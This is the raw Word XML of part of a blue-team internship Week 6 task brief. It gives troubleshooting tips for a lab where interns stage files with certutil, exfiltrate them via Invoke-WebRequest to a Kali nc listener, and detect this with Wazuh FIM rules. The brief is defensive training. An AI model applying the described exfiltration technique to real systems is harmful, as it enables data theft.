    <w:p w14:paraId="46D7D910" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The most likely cause is an incorrect IP address in the Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command. Confirm the IP in the command matches the Host-Only address of your Kali VM, not the NAT address. Also confirm the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener was running before you executed the command. If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was not listening, the connection attempt fails silently and nothing is received. Restart the listener and re-run the exfiltration command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF2608" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The custom </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule does not fire after creating </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the .b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>64 file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1752FE57" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After saving local_rules.xml, restart the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Manager service for the new rule to load. Then check the Manager log at /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/logs/ossec.log for any XML parsing errors mentioning your rule file. A single malformed tag makes the entire file invalid and prevents all custom rules from loading. If the file loaded without errors but the alert still </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">does not appear, confirm that your rule's match condition references the correct file path and extension, and that the rule is layered on top of the correct parent FIM rule ID using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>if_sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F405A0" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shows an error or garbled output instead of the decoded data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88C9E7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">certutil.exe adds a header and footer line when it encodes a file. The output looks like: BEGIN CERTIFICATE, then the Base64 data, then END CERTIFICATE. These header and footer lines are not part of the Base64 payload and will cause decoding errors if included. Remove those two lines before pasting into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the From Base64 recipe will decode cleanly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B689A5" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FIM alerts show the file was deleted but no creation alert appeared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB59E7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This means the FIM configuration was not active when the files were created. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can only alert on events it observed at the time they occurred. If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> block was not configured or the agent was not restarted before the attack, the creation events were missed. The deletion event appears because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detects that a file it was tracking has disappeared. If you are in this situation, re-run the full attack sequence from Step 1 with the FIM configuration correctly in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044E063" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D611E56" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>A Note on How to Approach This Week</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5CA6C" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Week 6 is different from the previous five weeks. There is no day-by-day breakdown with specific tasks mapped to each day. You have one scenario, one timeline, and one report to produce. How you allocate the time across the week is your decision. Use it deliberately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C34A67" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The attack takes under fifteen minutes to execute. The investigation and the report are where the real work is. Do not rush through the detection phase to get to the report. The quality of your incident report is entirely dependent on the depth of your analysis in Phase Two. Analysts who write strong reports are not better writers. They are more thorough investigators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0A41F6" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Every detection task in Phase Two has a deliberate connection to a skill from a previous week. FIM was Week 2. Custom rules were Week 2. Log correlation was Week 2. MITRE ATT&amp;CK mapping appeared in Week 4. If any of those areas feel unfamiliar, go back to those task briefs and review them before you proceed. This week is where those individual capabilities are meant to come together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40914D77" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Ask questions in the group. If you are stuck on why an alert is not appearing or why your rule is not loading, describe the problem in the group with the specific error or unexpected behaviour. Keep private messages for things that are genuinely private.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BD340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1DBB8" w14:textId="77777777" w:rsidR="00995672" w:rsidRDefault="00995672">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4EDB60A4" w14:textId="77777777" w:rsidR="00995672" w:rsidRDefault="00995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15954" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Cyberster</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> Blue Team Internship — Week 6 Task Brief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55E31" w14:textId="77777777" w:rsidR="00995672" w:rsidRDefault="00995672">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7061F5BB" w14:textId="77777777" w:rsidR="00995672" w:rsidRDefault="009956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518B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A56C92B2"/>
    <w:lvl w:ilvl="0" w:tplc="522E47E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BAE8DEC2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7090DDB0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4A10C94E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4254DDE2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DF32FE30">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FE92B990">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4CF23070">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A7A032EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C1B5B84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="404E6DB6"/>
    <w:lvl w:ilvl="0" w:tplc="69AA27F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="68703172">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6B76F0C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C272478C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1AD26978">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="765405FC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0DF6F938">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="606A4F4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A02E8E84">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E4012C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36E2E00C"/>
    <w:lvl w:ilvl="0" w:tplc="E4BEE634">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E064EF34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3DEE32A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9BE066B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="88AA5EE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A2C61AEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="84DE9A2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="25E65776">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E2DA425E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="783580578">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="652173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0D"/>
    <w:rsid w:val="001802A3"/>
    <w:rsid w:val="004C57DE"/>
    <w:rsid w:val="00621189"/>
    <w:rsid w:val="00725E37"/>
    <w:rsid w:val="00995672"/>
    <w:rsid w:val="00AA7213"/>
    <w:rsid w:val="00BD340D"/>
    <w:rsid w:val="00D721C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0A29"/>
  <w15:docId w15:val="{2BDF9936-3778-4E8E-B415-83C9AF3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30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2832</Words>
  <Characters>16148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Zia</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-06T15:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-26T15:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>